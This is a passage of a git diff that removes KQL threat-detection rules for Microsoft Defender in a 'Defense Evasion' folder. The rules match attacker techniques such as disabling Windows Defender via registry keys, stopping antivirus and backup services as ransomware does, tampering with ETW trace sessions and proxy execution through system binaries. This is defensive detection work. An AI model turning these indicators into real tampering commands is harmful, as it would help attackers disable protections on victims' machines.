Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
deleted file mode 100644
index 55ba5abb..00000000
--- a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
-// Date: 2023/04/20
-// Level: medium
-// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
-// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Service_Binary_Directory.kql b/Defense Evasion/Suspicious_Service_Binary_Directory.kql
deleted file mode 100644
index 684796f3..00000000
--- a/Defense Evasion/Suspicious_Service_Binary_Directory.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/09
-// Level: high
-// Description: Detects a service binary running in a suspicious directory
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Service_Installed.kql b/Defense Evasion/Suspicious_Service_Installed.kql
deleted file mode 100644
index 72b3dc93..00000000
--- a/Defense Evasion/Suspicious_Service_Installed.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
-// Date: 2019/04/08
-// Level: medium
-// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
-Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
-
-// Tags: attack.t1562.001, attack.defense_evasion
-DeviceRegistryEvents
-| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Sigverif_Execution.kql b/Defense Evasion/Suspicious_Sigverif_Execution.kql
deleted file mode 100644
index a4a4205f..00000000
--- a/Defense Evasion/Suspicious_Sigverif_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sigverif.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql b/Defense Evasion/Suspicious_Splwow64_Without_Params.kql
deleted file mode 100644
index 819070d3..00000000
--- a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects suspicious Splwow64.exe process without any command line parameters
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql b/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql
deleted file mode 100644
index 620e4c12..00000000
--- a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "comspec")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Userinit_Child_Process.kql b/Defense Evasion/Suspicious_Userinit_Child_Process.kql
deleted file mode 100644
index c667ab72..00000000
--- a/Defense Evasion/Suspicious_Userinit_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea)
-// Date: 2019/06/17
-// Level: medium
-// Description: Detects a suspicious child process of userinit
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not((ProcessCommandLine contains "\\netlogon\\" or (FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql b/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql
deleted file mode 100644
index b314305f..00000000
--- a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/06
-// Level: medium
-// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
-This allows to create values in the registry and install drivers.
-For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
deleted file mode 100644
index 714a3039..00000000
--- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @markus_neis
-// Date: 2021/07/07
-// Level: high
-// Description: Detects the image load of vss_ps.dll by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
deleted file mode 100644
index 76697076..00000000
--- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/31
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
deleted file mode 100644
index ddc53c62..00000000
--- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/02/17
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql b/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql
deleted file mode 100644
index e272b115..00000000
--- a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: bohops
-// Date: 2022/10/30
-// Level: medium
-// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent."))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql
deleted file mode 100644
index bf07a61d..00000000
--- a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov, Cyb3rEng
-// Date: 2021/08/23
-// Level: high
-// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
-// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql
deleted file mode 100644
index 633e76dc..00000000
--- a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: medium
-// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql
deleted file mode 100644
index 1e1cc728..00000000
--- a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/22
-// Level: high
-// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql b/Defense Evasion/Suspicious_Windows_Service_Tampering.kql
deleted file mode 100644
index 39f2a2c4..00000000
--- a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/09/01
-// Level: high
-// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
-// Tags: attack.defense_evasion, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))) or ((ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) or ((ProcessCommandLine contains " stop " or ProcessCommandLine contains " delete " or ProcessCommandLine contains " pause ") and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql b/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql
deleted file mode 100644
index 3a8d740e..00000000
--- a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/11
-// Level: high
-// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
-// Tags: attack.defense_evasion, attack.t1562.001, attack.t1070.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql b/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql
deleted file mode 100644
index 1d0f27c0..00000000
--- a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/26
-// Level: high
-// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql b/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql
deleted file mode 100644
index dbebbd92..00000000
